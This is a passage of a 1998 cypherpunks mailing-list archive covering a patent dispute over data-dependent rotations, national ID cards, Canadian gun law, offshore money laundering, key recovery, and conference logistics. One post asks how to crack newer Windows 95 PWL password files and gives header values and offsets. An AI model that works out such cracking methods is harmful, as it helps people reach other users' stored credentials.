dodging those kinds of bullets myself getting the FC conferences and this
summer's Philodox Symposium off the ground, I should have expected it from
someone else in the same shoes.


We all have Duncan Goldie-Scott to thank for this trip, of course. For the
past few months, I've been writing a series of articles on digital bearer
transaction settlement for the Financial Times Virtual Finance Report, which
Duncan edits. I started with cash, and then bonds, and then equity. This month
I did derivatives. I've got three more left to do, I figure; one on
micromoney, the other two on the possible macro-, and micro-, economic
inplications of digital bearer settlement, and maybe one more, on possible
deployment strategy, if we get that far.

Since I started these articles, I have gotten quite a few pieces of fan mail
from Duncan's subscribers, and it has been quite fun. It also seems that some
of those folks are going to be at this conference. In addition, after all the
dust settled, Duncan himself was made chairman of the conference, so I expect
he's going to have his hands full when I get there.

As if that wasn't enough, Duncan has also arranged for me to talk privately to
some traders he knows at an investment/merchant bank whose name you would
recognize, and that should be quite interesting.  Duncan says that they've
been reading my articles, and they've got lots of questions to ask.

So, Duncan, thanks so much for all your good efforts evangelizing digital
bearer transaction settlement to your friends in the City. I'm positively
psyched to unleash the word hoarde in the Old World, fire up the patented
Hettinga rant machine on that side of the pond, and all that.

God help you all. :-).


So, if anybody wants to get ahold of me in London for a beer and a schmooze
while I'm there, (especially if you know someone crazy enough to pay my
extortionate personal appearance fee for some of my scarce free time ;-)), the
Hilton Olympia's address is 380 Kensington High Street, London W14 8NL, and
phone number's 0171 603 3333.

You can, of course, email me as well, but, since this is my first trip to
Europe, I expect that internet connections, power, etc., for my trusty
PowerBook 540c will be interesting, if not, um, creative. So, it might be a
good idea to contact Duncan <mailto: dgs@live.co.uk>, or at lest cc: him on
your communications with me regarding this trip, or while I'm actually there,
as he's going to be the Official Philodox "Bob-Handler" on this trip. :-).


Here's hoping that I meet some of you in London week after next!

Cheers,
Bob Hettinga



-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNkxutcUCGwxmWcHhAQEqFQf+Nk+po/iJVHlQpVT3es/uokYkYb7T3nbv
NbEyDIEJkT4z5Jsp0omGU36/QFgF7iHAu614ehRAY/lhu7l1/ghrJdFKzQR+3lHU
UijWKYe3tyk15oBPhUI2e0G1K52MNSmDl9EL4GQ3hpbBCSOM4UO+4W1q3RYnucGA
b3p54QXpYeoRefAhSNiEjRc7Vup+EY1i6vkCONekr4+c9UugQ1sbGuRvCzcivXRk
g7o0lktxY1+sXaALEcSgB3sOnG0TJj/HPTpVcsjhw1SFKbxLPKJmytPJ8iR7MEi3
9JMk82Lr6AHTfokAQuLOsEMut8yfsjJ8glg2cxrys+Rbo1qGjHyL+g==
=RRO6
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 14 Nov 1998 02:48:23 +0800
To: cypherpunks@cyberpass.net
Subject: Duncan Frissell's "Blob" rides again...
Message-ID: <v04020a07b27223aa6852@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


MIME-Version: 1.0
Date: Fri, 13 Nov 1998 08:56:02 -0800
To: rah@shipwright.com
From: Somebody
Subject: Guns on the net..


oooo guns on Ebay... this guy is such a dickhead.

http://www.msnbc.com/news/214304.asp


A simple search of offerings listed on the Web site on Nov. 11 and 12
revealed the following: two cases of hypodermic needles, five sets of
Kevlar body armor, 33 AK-47 semi-automatic rifles, four lots of
&#0147;Talon&#0148; flesh-shredding ammo, one box of contraband Cuban
cigars, 11 lots of brass knuckles, 148 lots of federally banned switchblade
knives, six UZI submachine guns, one Mas 49/56 sniper rifle, three night
vision rifle scopes, one $3,500 pair of Leopard skin pants, a CDRom
containing the text of The Anarchist&#0146;s Cookbook as well as
instructions for how to build cable signal descramblers, how to obtain
Microsoft software for free, and how to get college degrees for free, 27
lots of drug accessories and head-shop paraphernalia, and 1,217 lots of
ivory items including a &#0147;bag of elephant ivory dust.&#0148;
(Microsoft is a partner in MSNBC.)


<Somebody's .sig>

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sat, 14 Nov 1998 04:24:44 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Rivest Patent
In-Reply-To: <199811130259.VAA11936@dewdrop2.mindspring.com>
Message-ID: <199811131924.NAA25772@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



JYA writes:

> Ron Rivest received on November 10 "US Patent 5835600: 
> Block encryption algorithm with data-dependent rotations:" 
> http://jya.com/rivest111098.htm (22K) 

So we can't use the rotate instruction with a data-dependent shift 
count in a block encryption algorithm without a license from Ron?

Foo on that.

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 14 Nov 1998 03:57:46 +0800
To: "Canadian Firearm Digest" <cypherpunks@toad.com>
Subject: national ID cards in the US...
Message-ID: <199811131840.NAA01803@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



Hi!  I received that today.  Maybe it can interest some of you.

========== excerpt ============

I Am Not a Number! Policy Spotlight on National ID Cards
--------------------------------------------------------
http://www.free-market.net/features/spotlight/9811.html

While most of us weren't looking, the U.S. Congress passed two bills
that effectively authorize national ID cards. One was a law to reform
health insurance that included a provision for a "Unique Patient
Identifier." The other was an immigration law that required all U.S.
states to include Social Security numbers on drivers' licenses.
[snip]
========= end of excerpt ============

Ciao

jfa







"Cryptography is like literacy in the Dark Ages. Infinitely potent, for good and ill... yet basically an intellectual construct, an idea, which by its nature will resist efforts to restrict it to bureaucrats and others who deem only themselves worthy of such Privilege."
_ A thinking man's Creed for Crypto/ vbm.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 14 Nov 1998 03:35:12 +0800
To: "Cypherpunks" <libre@colba.net>
Subject: Fwd: Turtles and Rocks(s)
Message-ID: <199811131844.NAA01899@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



==================BEGIN FORWARDED MESSAGE==================
>Date: Fri, 13 Nov 1998 06:37:41 -0500
>From: Dan MacInnis <dan.louise@sympatico.ca>

November 12th, 1998 the Toronto Board of Health announces they want to
ban private 
owner ship of snakes, turtles, any and all exotic pets.

Reaction of pet owners was immediate. In this city of just under 3
Million people, most said they would not abide by the law and hide their
beloved pets.

Where is Allan Rock when they need him?  Allan is a resident of Toronto,
surely he will leap to their aid and criminalize the ownership of
turtles?  Surely he knows Aunt Annie well enough to ask her to do it for
him?

[NOTE by the forwarder: the following paragraphs are a parody of bill C-68, 
the new firearms control bill.  jfa.]

But first, let's licence them. Register each, and the owners licenced.
Then, we will know where these dangerous critters are, just in case
later someone decides to hide a few. Where to put the sticker with the
unique number will pose a problem.

Later, we can ban them with impunity. The police can use the full force
of the Criminal Code to enter and search for turtles and spiders at
will.

OK, Saskatchewan, this is your time to line up at the trough for jobs as
Mirimachi did.

We will need a registry office, with 300 employee's, high tech and
trained bilingual people. Quebec does not need it, they are getting the
RCMP training jobs.

Hey, wait, maybe PEI wants it?
===================END FORWARDED MESSAGE===================

Ciao

jfa


Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:0xC58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:0x5B51964D:152ACCBCD4A481B0 254011193237822C
PGP ID:0x6CBA71F7:485888E9FD68415A2945 ACCB366D38486CBA71F7





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harvey Rook (Exchange)" <hrook@exchange.microsoft.com>
Date: Sat, 14 Nov 1998 06:27:01 +0800
To: "'Eric Cordian'" <cypherpunks@cyberpass.net
Subject: RE: Rivest Patent
Message-ID: <2FBF98FC7852CF11912A0000000000010D19AD69@DINO>
MIME-Version: 1.0
Content-Type: text/plain



It's a little bit more complicated than that. RC-6, which also uses data
dependant rotations is patent free.

Harv.

> -----Original Message-----
> From: Eric Cordian [mailto:emc@wire.insync.net]
> Sent: Friday, November 13, 1998 11:25 AM
> To: cypherpunks@cyberpass.net
> Subject: Re: Rivest Patent
> 
> 
> JYA writes:
> 
> > Ron Rivest received on November 10 "US Patent 5835600: 
> > Block encryption algorithm with data-dependent rotations:" 
> > http://jya.com/rivest111098.htm (22K) 
> 
> So we can't use the rotate instruction with a data-dependent shift 
> count in a block encryption algorithm without a license from Ron?
> 
> Foo on that.
> 
> -- 
> Sponsor the DES Analytic Crack Project
> http://www.cyberspace.org/~enoch/crakfaq.html
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 14 Nov 1998 06:03:41 +0800
To: "Cypherpunks" <libre@colba.net>
Subject: Rememberance Day 1998.
Message-ID: <199811132050.PAA06347@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



================= forwarded from CFD V2 #696 ============
Date: Fri, 13 Nov 1998 06:03:49 -0600
From: Dan MacInnis <dan.louise@sympatico.ca>
Subject: Rememberance Day 1998.

It is past eleven  O'clock here. It is November 11th, 1998.  On this
date every year
my mind always returns to thoughts of  my uncle, whose body, it's
elements long ago
 returned to the earth, the dust undisturbed in a European grave, the
man for whom I was
renamed when the sad news reached my mother and grandfather on that
early spring
morning many years ago. Even as child their wet faces impacted me,
forever.

It drifted today to Ottawa,  where I once stood cold but proud close to
one Paul Hellyer, then Minister of National Defense under the Honorable
Prime Minister  Lester Bowles  Pearson.
It was Rememberance Day, Paul was delivering the obligatory service
beside a Cenotaph,
the soldiers, sailors and airmen stood at ease waiting for the
ceremonies to end,
pretending to listen to his resonant,  educated voice. It was a bitter
cold day,
I knew they would prefer to be at their homes, or in their messes or
just anyplace but on parade that day.

I was proud to be associated with a government, indeed a country even,
with such diversity, such room for individuals to work, play and
overcome the challenges each would experience. It honestly was a Free
Canada, individuals could aspire to whatever their imaginations deemed
them worthy to become.

Later that evening, at a Military function, a member of the RCAF
suggested to me, each of us with the government issued glass in the
right hand, white serviette properly wrapped around it to keep the hand
warm and dry for handshaking, that someday he expected I would be
Minister of National Defense.  Sadly enough, we both believed it.

But today is November 11th, 1998, at about 11:50 AM.  My pride in the
Liberal Party of Canada has been shattered.  My belief that issues like
Conscription, which polarized our founding peoples for two generations,
would never surface, ever again, gone.   My belief that MY PARTY stood
for individual rights, the only force that would stand between the
Elite's and the common person, gone. Forever.  So it a doubly sad day
for me.  My uncle, and my Party. 

Bill C68 has intruded into the lives of so many Canadians, and if left
to stand as is, will undermine everything I stood there that cold Ottawa
morning to pay tribute, and everything my uncle died for in that foreign
field so long ago. He died with no idea the rifle he carried to fight
for our freedoms would become such a divisive symbol a few short years
later.

On this morning I shall not revisit the implications of C68. Rather, I
will ask those struggling to preserve out heritage to continue the
fight.  Do not surrender.

Then, when it becomes our time to let our earthly possessions go, when
our bodies begin
the journey back to the dust from whence they came and our spirits
return to source, 
perhaps the cold white silk of the casket or the sides of the urn
holding our ashes will be a bit warmer knowing we did all we could for
those who follow.

Anything less of us would be shameful.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ernest Hua" <hua@teralogic-inc.com>
Date: Sat, 14 Nov 1998 07:08:01 +0800
To: <cypherpunks@cyberpass.net>
Subject: Re: Info Age Crime Terror and War
Message-ID: <01c001be0f54$4642b940$4164a8c0@mve21>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
> At 9:09 AM -0800 11/13/98, John Young wrote:
> > Senator Kyl has issued a long report, "Crime, Terror &
> > War: National Security and Public Safety in the Information
> > Age," ...
> >   http://jya.com/ctw.htm  (97K)
>
> I'll address one section, near the end of the report:
> ...

While I wholeheartly believe that the open-minded and interested
public would want to hear these mindless rants responded to with
some rationality and reason, I don't believe, for a moment that
Kyl & gang are serious about debating anything.  (Ok, there is a
TEENY chance he is just confused.)

My money on the claim that these are yet more rhetoric thrown
out to confuse as many people who are easily taken over by sound
bites as possible.  It's not as easy to explain the practical
reasons why crypto restrictions are unenforcible and unreasonable,
but it's easy to trumpet the national security cause and to raise
the spectre of police not being able to protect lil' Johnny and
Mary.

What I was hoping for from the pro-crypto ads was something like
this:

1.  Lil' Suzy writes E-Mail to Lil' Mary to meet at the mall at
    some well-lighted public place.
2.  Child molestor X intercepts E-Mail, but it's weak 40-bit
    encryption, and he breaks it.
3.  Mr. X forges E-Mail from Mary to Suzy changing the meeting
    location to some dark corner A, and forges E-Mail from Suzy
    to Mary changing the meeting locaiton to some dark corner B.
4.  Mr. X's co-conspirators, Mr. Y and Mr Z intercepts Mary and
    Suzy at the respective dark corners ... they scream for help
    ... no one answers at either location ... fade to black ...

This is the sort of stuff that would really counter the stupid
rhetoric from Sen. Kyl.

Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Watts <davidwatts_98@yahoo.com>
Date: Sat, 14 Nov 1998 07:20:13 +0800
To: cypherpunks@cyberpass.net
Subject: U.S. Attorney Morgenthau on Money Laundering
Message-ID: <19981113224417.16157.rocketmail@send102.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



New York Times 

November 9, 1998, Monday  Editorial Desk 	
On the Trail of Global Capital 
By Robert M. Morgenthau
 
What are the five largest financial centers in the world? Many will
name New York, London, Tokyo and Hong Kong. But how many will guess
the fifth? It's the Cayman Islands -- or so, at least, its Government
claims on its Web site.
 
It's certainly the case that huge companies -- including hedge funds
like Long-Term Capital Management -- have made the Caymans their
nominal home. And bank regulators in the United States have confirmed
that bank deposits on the islands now total about $500 billion, twice
the amount of four years ago and more than the amount on deposit in
the New York Federal Reserve District. That is about $14 million for
every man, woman and child in the Caymans. The financial community
there consists of 575 banks and trust companies. More than 20,000
corporations are chartered on the Caymans.
 
What draws so many capitalists to so unlikely a spot? Secrecy, for one
thing. In the United States, capital markets are regulated by
requiring transparency in financial dealings. The Caymans, by
contrast, have no such openness, no tiresome restrictions on the
pursuit of wealth. With respect to regulation, the Caymans have won
the race to the bottom.
 
Take, for example, Long-Term Capital Management, which had to be
bailed out earlier this year. The fund's basic operations are
conducted in Connecticut, but it is chartered in the Cayman Islands.
The fund kept the details of its borrowings and investments secret --
a result not obtainable where there must be concerns for the curiosity
of regulators. The results were disastrous. No one knew the absurd
extent to which Long-Term Capital's confident superstars were
leveraging their assets -- until the bubble burst.
 
The Caymans' financial secrecy laws make it easy to hide suspect
dealings. It is now well known that the Bank of Credit and Commerce
International, whose collapse in 1991 was the biggest banking scandal
in history, took advantage of those laws. Beyond the assistance they
lend to criminals, secrecy laws aid reckless acts by high-rolling
entrepreneurs.
 
But in fact, most of the ''offshore'' Cayman banks are run not from
the islands, but from New York. Amazingly, the Cayman Government Web
site itself boasts that, of the 575 banks and trust companies
''based'' in the islands, a full 106 actually have a physical presence
there! Resort to these institutions is a simple charade. What would
happen if a determined American bank inspector flew to the islands and
demanded to see the books of one of these institutions? He would be
arrested. It's the law.
 
There is yet another explanation for the remarkable blossoming of
financial institutions in the Cayman Islands. The islands have no
income tax, no capital gains tax, no value added tax, no sales tax, no
inheritance tax and no tax treaties. Sophisticated Americans place
billions in Cayman investment vehicles like Long-Term Capital that are
carefully structured to reduce American tax liability. Citizens of
other countries invest billions there so their incomes will be exempt
from American taxes.
 
Commendably, the Treasury Department recently resolved to study ways
to keep sham transactions from having an impact on tax liabilities,
and the Group of Seven industrialized nations has said that hedge
funds should ''possibly'' be subject to disclosure rules. But those
are only tentative steps.
 
More can be done. The Cayman Islands are a British dependency, and
both the governor and the attorney general are appointed by the
British Government. This means Britain can end the laissez-faire
practices of the islands. And since, from a financial perspective, the
islands are an American dependency, Washington can also stop the
offshore shenanigans -- for instance, by imposing more prudent
oversight of lenders doing business with Cayman entities.
 
The Caymans are only part of the problem. The Isle of Jersey, the
British Virgin Islands, Cyprus, Antigua, Liechtenstein, Panama, the
Netherlands Antilles, the Bahamas, Luxembourg and, of course,
Switzerland all offer ''offshore'' sanctuary. Until action is taken to
eliminate these havens, taxpayers and honest players in the financial
markets will be at a very unfair disadvantage. 





_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 14 Nov 1998 06:06:32 +0800
To: cyphrpnk@rainbow.thinkthink.com (cypherpu)
Subject: Re: SIGH... NOT!! THC tainted oranges
In-Reply-To: <199811131959.LAA19533@rainbow.thinkthink.com>
Message-ID: <199811132049.OAA05427@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



I was not duped! In fact, I pointed the hoax out.

Anyway, I feel for you/.

igor

cypherpu wrote:
> 
> 
> 
> I just spoke by phone with john(author of the article in question)
>  at the sfbay guardian
> The article was distributed without the satire labeling that was
> present at the website... The article is Satire :(
> 
>      duped and disappointed :(
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 14 Nov 1998 05:37:58 +0800
To: Digital Bearer Settlement List <mac-crypto@vmeng.com
Subject: Woops! Lest I forget... (was Re: dbts: Hettinga's Road Trip toLondon...)
Message-ID: <v04020a14b27247e5ecef@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: "Simon Fedida" <windjammer@cableinet.co.uk>
To: "Duncan" <dgs@live.co.uk>, "Robert Hettinga" <rah@shipwright.com>
Subject: Re: dbts: Hettinga's Road Trip to London...
Date: Fri, 13 Nov 1998 20:24:36 -0000
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3

Robert -

My name is Simon Fedida, a colleague of Duncan's.  Don't forget you are
giving a talk at the London Business School on Monday 23 November...so don't
accept too many
beer invitations on monday!!

Looking forward to meeeting you

Simon


-----Original Message-----
From: Robert Hettinga <rah@shipwright.com>
To: Digital Bearer Settlement List <dbs@philodox.com>; dcsb@ai.mit.edu
<dcsb@ai.mit.edu>; e$@vmeng.com <e$@vmeng.com>; cryptography@c2.net
<cryptography@c2.net>; cypherpunks@cyberpass.net
<cypherpunks@cyberpass.net>; mac-crypto@vmeng.com <mac-crypto@vmeng.com>
:
:
<snip>


--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 14 Nov 1998 08:20:45 +0800
To: cypherpunks@cyberpass.net
Subject: RE: Rivest Patent
Message-ID: <364CC4AF.E30659DA@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Eric Cordian [mailto:emc@wire.insync.net] writes:
>> So we can't use the rotate instruction with a data-dependent shift 
>> count in a block encryption algorithm without a license from Ron?

"Harvey Rook (Exchange)" <hrook@exchange.microsoft.com> writes:
> It's a little bit more complicated than that. RC-6, which also uses data
> dependant rotations is patent free.

It's a little bit more complicated than that.  RC6 will be available
without licensing charges to anybody if it's tapped as the official
winner of the AES bakeoff.  If it's not selected, then it's my
understanding that RSADSI (Security Dynamics?) may choose to require
payment for licensing -- I assume based on the RC5 patent.  The current
understanding is that AES candidates sign over their rights only if they
are selected.  Several candidates have been explicitly put into the
public domain in advance of the selection process; RC6 is not one of these.

Please correct me if it's more complicated than <this>.
-- 
	Jim Gillogly
	Trewesday, 23 Blotmath S.R. 1998, 23:38
	12.19.5.12.6, 11 Cimi 19 Zac, Third Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@bigfoot.com>
Date: Sat, 14 Nov 1998 07:39:21 +0800
To: Steve Mynott <stevem@tightrope.demon.co.uk>
Subject: Re: network associates back in kra
In-Reply-To: <19981113201903.A25115@tightrope.demon.co.uk>
Message-ID: <Pine.LNX.4.02.9811131623270.15870-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 13 Nov 1998, Steve Mynott wrote:
>subject says it all
>
>roll on gpg

Well, They were automagically put back on the list when NAI bought TIS,
this has no baring on PGP at all.  Source code is in stores, and being
scanned as we speak, the PGP developers would not let them initiate any
KRAP stuff with pgp, they value there dignity and integrity.

Max
--   Max Inux <maxinux@openpgp.net>  Hey Christy!!! KeyID 0x8907E9E5
Kinky Sex makes the world go round O R Strong crypto makes the world safe
       If crypto is outlawed only outlaws will have crypto
Fingerprint(Photo Also): 259D 59F7 D98C CD73 1ACD 54Ea 6C43 4877 8907 E9E5






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Sat, 14 Nov 1998 01:11:40 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
In-Reply-To: <199811131436.IAA32048@einstein.ssz.com>
Message-ID: <364C5F24.E537D505@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> > From: "Frank O'Dwyer" <fod@brd.ie>
> > Under an "anarcho-whatever" people are left to their own devices.

[...]
> The implication is that individuals are making societal policies with no
> checks and balances (failure 1). 

You are missing the point completely -- there is no reason to suppose
that people, left to their own devices, would do anything other than
what people left to their own devices have already done, which is to put
in place all the present systems of law and government. The problem for
both your point of view and that of the "anarcho-whatevers" is that
there is no need to speculate about what an anarchy would look like, we
already have one. It's just that it doesn't resemble what either of you
thinks an anarchy should be. 

[...]

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sat, 14 Nov 1998 07:46:31 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Rivest Patent
In-Reply-To: <2FBF98FC7852CF11912A0000000000010D19AD69@DINO>
Message-ID: <199811132325.RAA26274@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Harvey Rook writes:

> It's a little bit more complicated than that. RC-6, which also uses data
> dependant rotations is patent free. 

Wasn't that a requirement for being an AES submission? 

As you may have guessed, I'm not a fan of permitting software to be
patented.  Particularly things like RSA for which obvious prior art
existed, and the plethora of microprocessor patents which cover things
like doing branch prediction and switching instruction sets in absurdly
obvious and simple ways.  Then you have the resulting silly lawsuits over
the silly patents and other innovation-suppressing and time-wasting
exercises.

The corporate "Push to Patent" is remarkably similar to the academic "Push
to Publish."  90% of the output of either is not worth reading. 

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: palmdeveloper@palmdevcon.com
Date: Sat, 14 Nov 1998 11:32:49 +0800
To: cypherpunks@toad.com
Subject: Enter Symbol's Developer Contest at the Palm Computing Platform Developer Conference!!! (revised message)
Message-ID: <199811140313.TAA21615@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Symbol announces the first annual Symbol SPT 1500 Developer Contest!!!!!

You could win a Toshiba Tecra 780 DVD 266 MHz Pentium II Notebook by developing
 the Best SPT 1500 Application

or

You could win a EXP PC Card DVD Traveler Bundle by developing 	the Best Riverbed Scout MTS 
Application or the Best Puma Satellite Forms Application or the Best IDEAM EZTrak Application.

Other cool prizes will also be awarded.  Everyone who participates will receive a t-shirt.

You must be a registered attendee of the Palm Computing Developer Conference to participate.

Winners will be announced at the Conference on December 4.  For more details
on the contest, and to register for the conference, point your browser to http://www.palmdevcon.com.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Sat, 14 Nov 1998 05:32:41 +0800
To: cypherpunks <cypherpunks@cyberpass.net>
Subject: network associates back in kra
Message-ID: <19981113201903.A25115@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



subject says it all

roll on gpg

-- 
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/

    if we knew what it was we were doing, it would not be called research,
would it?  - albert einstein




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Sat, 14 Nov 1998 14:22:25 +0800
To: cypherpu <cypherpunks@cyberpass.net
Subject: Re: SIGH... NOT!! THC tainted oranges
In-Reply-To: <199811131959.LAA19533@rainbow.thinkthink.com>
Message-ID: <v0311072bb272ac392d23@[209.109.232.44]>
MIME-Version: 1.0
Content-Type: text/plain



I always thought that crabgrass would be a better carrier for THC genes,
and give the DEA maximum fits.  However, given that 5 states have passed
medical pot initiatives, one over the attempts of their legislature to
destroy the previous initiative, perhaps the DEA has enough problems.  :-)


-------------------------------------------------------------------------
Bill Frantz       | Macintosh: Didn't do every-| Periwinkle -- Consulting
(408)356-8506     | thing right, but did know  | 16345 Englewood Ave.
frantz@netcom.com | the century would end.     | Los Gatos, CA 95032, USA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris <st_chris@gmx.net>
Date: Sat, 14 Nov 1998 05:26:43 +0800
To: cypherpunks@toad.com
Subject: How do crack newer Win95 PWL files ?
Message-ID: <364C96E2.786E17F1@gmx.net>
MIME-Version: 1.0
Content-Type: text/plain



Does anybody know how the newer Win95 PWL files could be cracked ?
I mean not those files which work with GLIDE
(Header of those files is: 0xB04D464E = ".MFN", their username
starts at position 0x208).

I mean PWL files which have the following header: 0xE3828596
and the information begins at 0x252 !
I've pointed out that these PWL files depend in some way
on a kind of randomness, a counter how often you have changed
your password and may be on the username or the password.

So if anybody knows how this could be done please let me know.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: palmdeveloper@palmdevcon.com
Date: Sat, 14 Nov 1998 14:04:05 +0800
To: cypherpunks@toad.com
Subject: Enter Symbol's Developer Contest at the Palm Computing Platform Developer Conference!!! (revised message)
Message-ID: <199811140539.VAA02299@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Symbol announces the first annual Symbol SPT 1500 Developer Contest!!!!!

You could win a Toshiba Tecra 780 DVD 266 MHz Pentium II Notebook by developing
 the Best SPT 1500 Application

or

You could win a EXP PC Card DVD Traveler Bundle by developing the Best Riverbed Scout MTS 
Application or the Best Puma Satellite Forms Application or the Best IDEAM EZTrak Application.

Other cool prizes will also be awarded.  Everyone who participates will receive a t-shirt.

You must be a registered attendee of the Palm Computing Developer Conference to participate.

Winners will be announced at the Conference on December 4.  For more details
on the contest, and to register for the conference, point your browser to http://www.palmdevcon.com.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 14 Nov 1998 05:59:49 +0800
To: cypherpunks@toad.com
Subject: reptilian politicians
Message-ID: <199811132049.VAA28800@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




>November 12th, 1998 the Toronto Board of Health announces they > want to
ban private 
>owner ship of snakes, turtles, any and all exotic pets.

>Reaction of pet owners was immediate. In this city of just under 3
>Million people, most said they would not abide by the law and >hide their
beloved pets.

In california, possession of a ferret is illegal.  
But its illegal for people eat california horses.  Or burros, senators,
and other asses.

Those in the Ferret Underground (TM) find that horsemeat
is now cheaper, and the furry ones love it.


--Weasels ripped my flesh










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scoops <scoops@quiknet.com>
Date: Sat, 14 Nov 1998 15:54:56 +0800
To: cypherpunks@cyberpass.net
Subject: Re: DBS, Privacy, Money Laundering nonsense.
In-Reply-To: <v04020a08b272c6e9f408@[139.167.130.246]>
Message-ID: <199811140726.XAA03250@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain






At 12:43 AM 11/14/98 -0500, Robert Hettinga wrote in Response to Black
Unicorn:
>--- begin forwarded text
>
Scoops response:

Mr. Hettinga your comments on the federal abuses on money laundering
prosecutions are right on.  As an attorney I have seen time and time again
the mere *threat* of bringing a money laundering charge enough to make
innocent defendants take pleas.  We all know that the crime of money
laundering was invented to catch mafiosos and other scofflaws.  However the
gradual broadening of the intent of the statute now just catches ordinary
people in the course of either legal or illegal activities that involve a
bank -- or other financial institution.  A bookkeeper is accused of
embezzling $10,000 from his employer and puting the money in his checking
account.  Lets say he has a reasonable defense to his actions.  Was the
money laundering statute intended to cover this crime?  No.  Will a federal
prosecutor (or even state) lay on a money laundering charge?  Of course.
The deal is, if the guy loses, he gets six months on the embezzlement and a
*minimum* of five or seven years on money laundering.  So you tell me?
Does he plead even if he could beat the embezzlement rap?  Of course.

A quick story.  True unfortunately.  A guy sells parts for jet planes.
Expensive.  Usual tab $50,000 to $200,000.  One day he sends an invoice for
